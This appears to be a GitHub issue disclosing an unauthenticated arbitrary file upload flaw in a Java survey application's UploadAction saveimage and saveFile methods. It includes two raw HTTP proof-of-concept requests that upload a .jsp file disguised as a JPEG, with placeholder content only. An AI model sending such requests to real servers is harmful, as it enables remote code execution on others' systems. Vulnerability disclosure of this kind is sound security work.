You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
``The saveimage method and saveFile in the com/key/common/base/action/UploadAction.java file can directly upload any type of file without authorization
For the saveimage method, this method can be directly called without authorization to upload any specified type of file to the /file/images/ directory, and this directory can be accessed through a browser normally, so malicious files can be uploaded for remote code execution
Similarly, for the saveFile method, this method can also be directly called without authorization to upload any specified type of file to the directory specified by basepath under the /file directory, and this directory can be accessed through the browser normally, so malicious files can be uploaded file for remote code execution
``The saveimage method and saveFile in the com/key/common/base/action/UploadAction.java file can directly upload any type of file without authorization
For the saveimage method, this method can be directly called without authorization to upload any specified type of file to the /file/images/ directory, and this directory can be accessed through a browser normally, so malicious files can be uploaded for remote code execution
`POST /diaowen/up/upload!saveimage.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Connection: close
Content-Length: 395
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde
Accept-Encoding: gzip, deflate
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"
Content-Type: image/jpeg
testnixxx
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyFileName"
1.jpg
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyContentType"
image/jpeg
------WebKitFormBoundary12345abcde--
`
Similarly, for the saveFile method, this method can also be directly called without authorization to upload any specified type of file to the directory specified by basepath under the /file directory, and this directory can be accessed through the browser normally, so malicious files can be uploaded file for remote code execution
`POST /diaowen/up/upload!saveFile.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Connection: close
Content-Length: 489
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde
Accept-Encoding: gzip, deflate
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="basepath"
files
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"
Content-Type: image/jpeg
testnixxx
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyFileName"
1.jpg
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyContentType"
image/jpeg
------WebKitFormBoundary12345abcde--
`
The text was updated successfully, but these errors were encountered: